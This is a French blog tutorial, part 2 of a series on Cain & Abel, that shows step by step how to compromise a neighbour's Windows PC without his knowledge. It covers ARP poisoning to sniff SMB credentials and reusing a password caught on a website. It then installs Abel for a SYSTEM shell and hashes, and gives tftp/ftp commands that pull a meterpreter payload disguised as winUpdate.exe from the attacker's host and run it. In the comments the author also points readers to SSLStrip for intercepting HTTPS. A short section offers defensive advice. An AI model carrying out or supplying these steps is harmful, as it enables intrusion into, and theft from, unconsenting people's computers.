Caïn et Abel comme un nul(l) (Partie 2/4)

Bonjour à tous !

Aujourd’hui, nous obtiendrons une ligne de commandes sur l’ordinateur de Néo, notre voisin geek qui se targue d’avoir un NAS 5 baies… et c’est trop nul(l) parce qu’il l’a eu 3 jours avant vous !

Nous obtiendrons l’accès sans aucune validation de la part de Néo, même pas une petite fenêtre de confirmation ou la moindre alerte de la part d’Avast.

Mr. Anderson ?

Avant de commencer

Un NAS, c’est ça :

Un disque dur réseau.

Un voisin geek, c’est ça (stéréotypes bonjour) :

Un geek quoi…

Etape 1 : sniffer avec Caïn

L’étape principale de notre piratage consistera à attendre…

Configurons Caïn, comme vu dans l’article précédent, mais activons l’ARP poisoning sur tous les ordinateurs du réseau. Nous tentons en effet d’obtenir les identifiants de connexion de Néo à son disque dur réseau ou entre deux ordinateurs du réseau. (Contrairement à ce qu’indique Caïn, l’empoisonnement  ARP fonctionne très bien avec ma carte WIFI)

Cet article vous apprendra la patience. Effectivement, nous devons maintenant attendre que Caïn récupère des données dans les catégories autres que « HTTP ». Dans le cadre d’une connexion à un NAS, la catégorie SMB devrait se remplir.

Nous disposons maintenant du nom d’utilisateur sur l’ordinateur de Néo !

On remarque que ce dernier a utilisé le même nom d’utilisateur sur un site Intenet :

Nous avons maintenant un mot de passe ! (S’il avait eu un mot de passe différent pour sa session Windows, il nous aurait suffit d’attendre un peu plus qu’un autre mot de passe apparaisse)

Etape 2 : se connecter

Obtenir le bon mot de passe du premier coup est une utopie. Généralement le commun des mortels a 3 ou 4 mots de passe différents.

Tester le mot de passe obtenu

Rendez-vous dans l’onglet Network sur caïn.

Comme on connait l’adresse de l’ordinateur sur lequel on veut se connecter, faisons un clic droit sur Quick List, sélectionnons Add to Quick List et entrons l’adresse IP de Néo.

Faisons encore un clic droit, cette fois ci sur l’ordinateur qui vient de s’ajouter dans la Quick List, puis sélectionnons Connect As.

Nous voici connecté à l’ordinateur.

Dans notre cas, comme dans la plupart des cas sur un ordinateur de particuliers, Néo avait les droits d’administration sur son ordinateur.

Si ça n’avait pas été le cas, on aurait pu cliquer sur User, dans l’arborescence de l’ordinateur, pour obtenir une liste des utilisateurs existants. Il nous aurait alors suffit d’essayer à nouveau les mots de passe avec le nom d’utilisateur correspondant à un compte administrateur.

Installer Abel

Avec un compte administrateur, installer Abel n’est qu’une formalité. Il suffit de faire un clic droit sur Services dans l’arborescence de l’ordinateur et sélectionner Install Abel.

On obtient alors une nouvelle catégorie dans l’arborescence : Abel. (Il peut être nécessaire de se déconnecter puis se reconnecter à l’ordinateur de Néo)

Abel propose :

  • Une ligne de commande avec les droits de l’utilisateur system.
  • Les hachages des mots de passe sur le système (Nous verrons plus tard comment les décrypter)
  • La table de routage de l’ordinateur
  • Les tables TCP et UDP pour connaître les connexions en cours.
  • Des données hexadécimales imbuvables dans la catégorie LSA Secrets.

Bonus : Installer et lancer meterpreter

Nous pouvons maintenant exécuter les programmes que nous souhaitons sur l’ordinateur de Néo. Si ça nous chante, on peut même y copier meterpreter et le lancer.

Avec, par exemple,  un serveur FTP sur notre machine de pirate, on peut aisément transférer des fichiers à l’aide de la commande tftp (ou ftp si cette dernière n’est pas disponible).

tftp

cd \Users\[Nom d'utilisateur]
tftp -i 192.168.0.103 get monMeterpreter.exe winUpdate.exe
winUpdate.exe

« -i » pour binary image transfer afin de transférer notre fichier en mode binaire.

« 192.168.0.103 » est l’adresse de notre ordinateur de pirate.

« monMeterpreter.exe » est le nom du fichier sur le serveur.

« winUpdate.exe » est le nom qu’aura le fichier sur l’ordinateur de Néo.

ftp

C’est ici plus compliqué car ftp fonctionne en mode interactif, ce que ne supporte pas Abel. Il faudra créer un fichier de commandes que l’on passera en paramètres à ftp :

echo open 192.168.0.103 > connect.txt
echo user Anonymous >> connect.txt
echo >> connect.txt
echo lcd \Users\[Nom d'utilisateur] >> connect.txt
echo recv monMeterpreter.exe winUpdate.exe >> connect.txt
echo close >> connect.txt
echo quit >> connect.txt
ftp -s:C:\connect.txt -n
cd \Users\[Nom d'utilisateur]
winUpdate.exe

Conclusion

Toute la méthode a consisté à attendre patiemment que Néo veuille bien utiliser son NAS et se connecter à un site Internet non sécurisé avec le même mot de passe qu’il utilise pour Windows.

Cette méthode fonctionne particulièrement bien sur les geeks. Ces derniers sont en effet tentés d’utiliser à outrance les partages réseaux, permettant ainsi aux pirates d’intercepter les identifiants Windows qui transitent.

Ce qu’il faut retenir

Cette attaque repose sur le partage administrateur. En effet, sans ce dernier, nous n’aurions pas été capable d’installer Abel. Notez que lorsque vous achetez un ordinateur, ce partage est activé par défaut. Il faut aller dans la base de registres pour le désactiver. Je vous le conseille fortement car il est très rare qu’un particulier utilise ce type de fonctionnalités.

En entreprise, pour des raisons administratives, il est tout bonnement impensable de désactiver ce partage. Il faut alors impérativement disposer d’un système de détection d’intrusion pour donner du fil à retordre à ce type d’attaque.

De plus, Néo aurait pu rendre cette attaque plus compliquée s’il n’avait pas utilisé son mot de passe Windows pour autre chose que Windows…

Avast ne détectant pas Abel comme malveillant, l’installation de cet antivirus n’aurait rien changé.

Dans le cadre d’une entreprise, même si les employés n’utilisent leur mot de passe que pour Windows, si le protocole NTLM est utilisé, Caïn est capable de :

  • Affaiblir le niveau de sécurité du protocole NTLM
  • Récupérer les hachage des mots de passes ainsi que les noms d’utilisateurs correspondants
  • Décrypter rapidement les hachages ainsi affaiblis.

Une fois que la hacker a réussi à s’introduire sur votre réseau, vous n’aurez presque aucune chance d’en sortir indemne sans système de détection d’intrusion…

Nous verrons dans notre prochain article que Caïn propose justement une fonctionnalité pour casser les clefs WEP et ainsi s’introduire dans votre réseau !

Caïn et Abel comme un nul(l) (Partie 1/4)

Caïn et Abel comme un nul(l) (Partie 3/4)

Caïn et Abel comme un nul(l) (Partie 4/4)

Parce que je n’ai pas la science infuse : sources

Publicités
À propos

Un informaticien, qui tente de faire comprendre au public que l'informatique n'est pas si compliquée, malgré des acronymes et autres termes obscurs pour faire croire que c'est difficile (et que c'est de votre faute si "ça ne marche pas")

Tagged with: , , , , , , , , , , , , , , , ,
Publié dans Cracking, Informatique, Intrusion, Piratage, Sans fil, Windows
14 comments on “Caïn et Abel comme un nul(l) (Partie 2/4)
  1. Pedy dit :

    bonjour Mystcaster!! j ai une question: peut on pirater un ordi sous windows a partir de linux vu qu ils n ont le meme systeme de fichier,le meme noyau?!!

    • mystcaster dit :

      Bonjour,

      Caïn & Abel est une application Windows. Elle n’existe donc pas sous Linux.
      Par contre, vous pouvez vous référer à cet article qui présente un exemple d’intrusion sous Windows à partir d’un Linux : https://piratercommeunnul.wordpress.com/2012/09/15/latteinte-a-la-vie-privee-comme-un-null-seconde-partie/

      J’avais d’ailleurs répondu à l’une de vos question en pensant qu’elle se référait à cet article.

      Néanmoins je ne connais, à l’heure actuelle, pas de logiciel sous Linux qui soit aussi performant que Caïn & Abel pour le type d’intrusion présenté ici.

      • Pedy dit :

        ok! merci! est ce que c est preferable de faire une intrusion windows a partir de linux? c est quoi le meilleur systeme pour faire une intrusion windows? linux ou windows?

      • mystcaster dit :

        Au fil de mes articles j’espère montrer qu’il ne faut avoir aucune préférence entre Linux et Windows pour pirater.

        Linux est très polyvalent et permet de comprendre facilement ce que l’on fait, c’est pour ça que je le conseille pour débuter.

        Sous Windows, on ne peut pas tout faire, mais certains logiciels sont plus performants que sous Linux et plus simples d’utilisation. Par contre ils ne permettent pas de comprendre tout ce que tu fais.

        Personnellement j’ai Windows et Linux (Backtrack) installés en dual boot. Je te conseille d’opter pour cette solution.

        Il faut retenir que pour pirater, tous les moyens sont bons. Oublie donc les discours de ces pro-Linux ou pro-Windows. Chaque système a ses forces et ses faiblesses. Il faut donc tous les garder et tous les maîtriser si tu veux apprendre la sécurité informatique.

  2. Abde dit :

    Salut mystcaster , jai lu tes articles mais je suis un peu perdu , on pourrait se parler sur fb ou autre pour que tu m expliques stp .

  3. Andromac dit :

    Merci vraiment pour ces tuto ,ils ont l’air très détaillés et surtout en français :p
    Je suis loin de ton niveau ,j’ai découvert bactrackt il y a seulement 1 semaine et Cain il y a deux jours mais je pense que ton site va bien m’aider pour sécuriser mon réseau 😉

  4. koloce dit :

    L’étape 1, je veux bien. Mais wtf, l’étape 2. Comment tu te connectes ? Il te faut bien un service pour te connecter. Ne me dis pas que rpc est activé par défaut en remote.

    • mystcaster dit :

      Il faut arriver à « Ce qu’il faut retenir » pour comprendre comment on a installé abel sur la machine distante : l’administration à distance doit être activée.
      C’est le cas par défaut…

  5. Nùménor dit :

    Bonjour Mystcaster, et un grand merci pour ce tutoriel 😉

    Je me retrouve face à un problème étrange : Cain est suposé ne pas fonctionner pour la wifi, mais pour toi ça marche.
    J’ai donc tenté le coup, je n’ai aucune idée de si je peux passer ma carte en mode promisuous ou monitor sur windows, mais lorsque je teste cela sur mon réseau wifi presonnel, je trouve simplement la box (192.168.1.1) alors que mon autre machine (192.168.1.58) est connectée.
    J’ai d’ailleurs tenté de ping l’ip de l’autre machine mais je n’ai pas de réponse. S’agit-il d’une sécurité sur les box récentes ? Une protection spécifique contre ce problème depuis windows 8 ( j’ai vu que l’ipv6 n’utilisait plus ARP )? Est-ce ma carte wifi qui n’est pas compatible ? Où ai-je simplement fait une erreur idiote ?

    Merci pour ton aide 😉

    • mystcaster dit :

      Il semblerait que la réponse au ping soit désactivée par défaut sous Windows 8 : http://www.sysprobs.com/how-to-enable-ping-reply-response-in-windows-8-simple-steps

      La version 4.9.56 de caïn et abel a l’air d’ajouter pas mal de support pour Windows 8, à tester : http://www.oxid.it/

      • Nùménor dit :

        Je te remercie Mystcaster pour cette réponse. J’ai finalement réussi à router ma seconde machine 😉

        Le point que j’ai du mal à comprendre c’est le fonctionnement de la récupération des mots de passes. J’ai tenté de me connecter à plusieurs sites, afin de voir si je récupérais des pass, même cryptés, et rien …

        Le fait est que j’ai récupéré plein de certificat ( tous en HTTPS ), le sniffing fonctionne donc correctement.

        Cain devrait logiquement détecter les transferts de mots de passes même si il ne parvient pas à les décrypter non ? Ou alors il le protocole HTTPS est sécurisé contre ce type d’attaque ?

      • mystcaster dit :

        Concrètement, le protocole HTTPS chiffre toute la communication (après avoir fait le SSL handshake).
        Du point de vue de Caïn, il ne voit donc passer qu’une suite d’octets sans signification (il n’a ni le nom des champs, ni leur valeur. Pour lui il ne s’agit que d’un gros message sans signification.)

        Les certificats ont dû pouvoir être récupérés durant le SSL handshake. Tu peux coupler Caïn avec SSLStrip (un utilitaire python) pour récupérer les informations qui transitent via HTTPS (le fonctionnement est un peu trop long à expliquer dans un commentaire 🙂 )

  6. Nùménor dit :

    D’accord merci bien 😉 Je vais tenter de faire fonctionner SSLStrip.

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s

MystCaster
septembre 2012
L M M J V S D
« Août   Oct »
 12
3456789
10111213141516
17181920212223
24252627282930
Catégories
Archives
%d blogueurs aiment cette page :